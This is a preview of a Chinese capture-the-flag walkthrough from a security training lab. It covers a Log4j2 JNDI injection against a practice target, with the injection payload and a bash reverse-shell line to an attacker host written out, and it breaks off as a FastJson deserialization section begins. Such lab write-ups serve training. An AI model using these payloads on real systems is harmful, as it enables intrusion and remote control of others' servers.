文章预览
Taoing “MS08067实验室,专注于网络安全技能培训与服务。" 号外号外,"Ms08067练武场" 最强劲的第一批选手打靶思路来啦。 官网链接 :http://attck.ms08067.com/ Part1 log4j2,⽬标站点:http: //27.25.151.24:29458/hello?payload=111 访问站点后,发现参数payload为可控点后, 对该参数进行黑盒测试 尝试 JNDI注入时 , 语句为:${jndi:dns://teg756.dnslog.cn} 得 到dnslog回显记录, 说 明目标服务器存在JNDI漏洞, 并且可出网 使用JNDI-Injection-Exploit.jar工具生成反弹shell : (反弹语句:bash -i > & /dev/tcp/xx..xx.88/10001 0> & 1) 在攻击机上监听10001端口后, 将JNDI-Exploit生成反弹shell发送给服务器 攻击机 得到目标 bash 获取环境变量得到flag{b423788e-d7b7-4e1abd58-9e73b447d575} Part2 测试目标:目标站点:http://27.25.151.24:23953/ 漏洞发现:FastJson 反序列化漏洞访问漏洞所在URL后, 服务器返回了数据信息, 并且通过标
………………………………